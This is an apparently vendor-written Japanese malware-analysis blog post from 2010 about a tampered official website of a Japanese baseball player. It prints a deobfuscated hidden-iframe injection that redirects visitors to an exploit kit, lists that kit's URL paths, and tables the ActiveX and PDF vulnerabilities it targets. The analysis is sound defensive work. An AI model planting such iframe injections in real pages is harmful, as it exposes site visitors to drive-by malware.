2010年4月23日 夕刻頃(日本時間)より、正規Webサイトを改ざんし、不正なプログラムが自動でダウンロードされるようにする「Webからの攻撃」に分類される脅威が相次いで確認されています。今回は、その中から一例をとりあげ、現在の脅威動向について分析してみます。
我々の不正サイトクローリングシステムによれば、4月23日に「gr<省略>ad.com」が「This URL is currently listed as malicious.」(不正サイト)として評価が行われていることを確認しています。
 |
|
|
各国のリサーチエンジニアは、不正サイトクローリングシステムにより自動評価された情報と独自の分析結果を総合的に判断し、担当国における影響を調査しています。
今回、私は不正サイト「gr<省略>ad.com」へ自動転送する改ざん被害を受けているサイトの一つとして、ある「日本人プロ野球選手のオフィシャルサイト」を特定しています。
 |
| 図2 被害サイトは「Google Safe Browsing」から「このサイトはコンピュータに損害を与える可能性があります。」と評価されている。 |
改ざん被害と聞くと多くの人は昨年より被害が続く「ガンブラー攻撃」を思い浮かべるのではないでしょうか。当ブログ(該当記事:2010/02/10 マルウェア解析の現場から-03 Gumblar攻撃)や弊社サイト(該当記事:猛威を振るうGumblar(ガンブラー)の脅威とその対策)においてもこれまで何回かその被害を取り上げ、被害実態と対策について紹介してきました。今回新たに確認された被害は従来と同一の攻撃によるものと言えるのでしょうか。被害サイトに対して外部から探りを入れてみたいと思います。
手始めに被害サイトのドメイン名を元に「Whois検索」をかけてみたいと思います。サイトの信頼性を判断する材料として「Created: (ドメイン登録日)」/「Updated: (ドメイン更新日)」は注目すべき値です。当該サイトは「Created: 2002-02-19」/「Updated: 2009-10-08」。歴史あるサイトに対しては一定の高評価ができます。
続いて注目したのは、「ICANN Registrar: (レジストラ)」情報。当該サイトは「NETWORK SOLUTIONS, LLC.」。この名前を聞いて「ピンときた」方はかなりの情報通でしょう。4月11日に同登録業者のホスティングサービスを利用していたブログに対して大規模改ざん攻撃が発生していたことが確認されています(該当記事:2010/04/11 WordPress Blogs Suffer from a Mass Compromise)。なんだか怪しい雲行きになってきました。解析を続けましょう。
視点を変えて、被害サイトのヘッダ(HTMLソースコード)に注目しています。そこには、次の記録が確認できます。
| !– Fireworks 4.0 Dreamweaver 4.0 target. Created Wed Feb 17 12:02:20 GMT-0800 |
順当に考えれば、ホームページ作成ソフトにより、2月17日に更新されたページであると推定できます。また、改ざん被害は更新日以降に行われた可能性が高いとも推定できます。もちろん、正確な特定はサイト管理者のもつ複数のログを照らし併せて特定する必要があることは言うまでもありません。
更に解析を続けましょう。</head>タグ以下、<body>タグ中に難読化されたスクリプトが確認できます。攻撃者の意図を知ることのできる最も重要な手がかりといえます。
 |
|
|
難読化を解除してみたいと思います。
| <iframe> frameborder=”0″ onload=’ if (!this.src){ this.src=”http://gr<省略>ad.com/in.cgi?2“; this.height=0; this.width=0;} ‘></iframe> |
赤文字箇所に注目してください。IFRAMタグを使って「gr<省略>ad.com/in.cgi?2」へ転送していることが読み取れます。この転送先は攻撃者にとってのゴールでしょうか。
 |
|
|
やはりそこには、難読化が施されたJavaScriptが潜んでいました。「gr<省略>ad.com」から更に転送された「gi<省略>st.com/grep」。どうやらここが悪の巣窟のようです。
IFRAMEタグで指定された「gi<省略>st.com」についてもう少し詳しく見てみましょう。IPアドレス情報から位置情報に変換したところ、「Turkey:トルコ共和国」に位置するサーバに転送されていることが特定できます。
「gi<省略>st.com/grep/error.js.php」に仕掛けられたスクリプトは「Adobe Reader/Adobe Acrobat」の抱える脆弱性を突いてきました。PDFの機能を使って転送を仕掛けるための攻撃です。同時にブラウザ環境情報を送信します。更なる攻撃へのシナリオ作りと行ったところでしょうか。
環境情報を送信させている場合、アクセス方法によって異なる結果がもたらされることを意味していると考えて間違いないようです。今回、可読化したスクリプトにヒントを得て、「gi<省略>st.com/grep/?spl=2&br=MSIE&vers=7.0&s=」のパラメータ送信を試みてみました。
パラメータを受け取ったサーバの返答は「gi<省略>st.com/grep/load.php?spl=ActiveX_pack」への転送。ソースコード記載の「clsid」を読み解いて行くことで、攻撃者が狙っている脆弱性をあぶりだします。
 |
|
|
図7は、「gi<省略>st.com/grep/?spl=2&br=MSIE&vers=7.0&s=」パラメータを与えた場合の振る舞いです。異なるパラメータ(他のブラウザ環境)である場合、別の脆弱性(例:「grep/load.php?spl=javas」、「/grep/load.php?spl=mdac」、「/grep/load.php?spl=Opera_telnet」、「/grep/load.php?spl=MS09-002」、「/grep/load.php?spl=pdf_2030」)に誘導されることも明らかと成っています。ここですべてを言及することは困難ですが、対策側である我々は、攻撃者がその状況に応じて最適な(攻撃成功確率の高い)脆弱性を狙っていると考えることが重要といえそうです。
|
CLSID |
アプリケーション名 |
CVE番号 |
脆弱性フィルタ番号 |
|
CA8A9780-280D-11CF-A24D-444553540000 |
Adobe Reader/Adobe Acrobat |
CVE-2008-2992; CVE-2009-0927 |
1003026/1003009; 1003405/1003478 |
|
97AF4A45-49BE-4485-9F55-91AB40F288F2 |
Office OCX Word Viewer OCX ActiveX |
調査中 |
N/A |
|
97AF4A45-49BE-4485-9F55-91AB40F22B92 |
PowerPoint Viewer OCX ActiveX |
調査中 |
N/A |
|
97AF4A45-49BE-4485-9F55-91AB40F22B92 |
PowerPoint Viewer OCX ActiveX |
調査中 |
N/A |
|
97AF4A45-49BE-4485-9F55-91AB40F22BF2 |
Word Viewer OCX ActiveX |
調査中 |
N/A |
|
18A295DA-088E-42D1-BE31-5028D7F9B965 |
Excel Viewer OCX ActiveX |
調査中 |
N/A |
|
3356DB7C-58A7-11D4-AA5C-006097314BF8 |
Symantec AppStream Client LaunchObj ActiveX(launcher.dll) |
CVE-2008-4388 |
1003235 |
|
7F9B30F1-5129-4F5C-A76C-CE264A6C7D10 |
Hummingbird Deployment Wizard 2008(DeployRun.dll) |
CVE-2008-4728 |
N/A |
|
2BCEAECE-6121-4E78-816C-8CD3121361B0 |
Peachtree Accounting ActiveX(PAWWeb11.ocx) |
CVE-2008-4699 |
N/A |
|
C1B7E532-3ECB-4E9E-BB3A-2951FFE67C61 |
C6 Messenger Installation Url Downloader ActiveX |
CVE-2008-2551 |
N/A |
主要なアプリケーションの脆弱性については、「脆弱性フィルタ」による「仮想パッチ」の対策効果が期待できることを確認しました。「脆弱性フィルタ」とは、「ウイルスバスター コーポレートエディション」のプラグイン製品である、「侵入防御ファイアウォール」(Intrusion Defense Firewall)や、「Trend Micro Deep Security」にて提供されている機能です。
「脆弱性フィルタ」による「仮想パッチ」は、公開されている脆弱性を標的にした攻撃をブロックします。攻撃手法の公開からパッチ適用までの間に発生するセキュリティ上の空白時間に対する対策を提供し、正式にリリースされたパッチを検証・適用後に改めて適用をはずすという柔軟な運用が可能になります。
脆弱性を抱えている場合、何が起こりうるのか。攻撃者の狙いであるウイルス(実行ファイル)のダウンロードにつながります。今回確認されたのは「TROJ_SASFIS.AJ」(gi<省略>st.com/grep/load/load.exe)でした。これまでの攻撃者の戦略を考えれば、いずれ「TROJ_SASFIS.AJ」は新種に置き換えられるものと推測します。我々は彼らの動向を引き続き監視する必要がありそうです。
今回の攻撃を何と呼ぶのか。どこまでの範囲をどの名称で呼ぶのかという判断となるため、ここでの言及は避けたいと思います。しかしながら、「gi<省略>st.com/grep/」をクローリングすると攻撃者のしっぽが見えてきます。「CaaS:Crimeware as a Service」、「MaaS:Malware as a Service」とも呼ばれるツール「El<省略>re Exploits pack version 1.3.2」の管理画面です。一連の攻撃はこのコンソールから指示が出され企てられた攻撃であると推定されます。
 |
|
|
最後に、トレンドマイクロのクラウド型セキュリティ基盤「Smart Protection Network」や「脆弱性フィルタ」が今回の攻撃においても有効であることを紹介しておきます。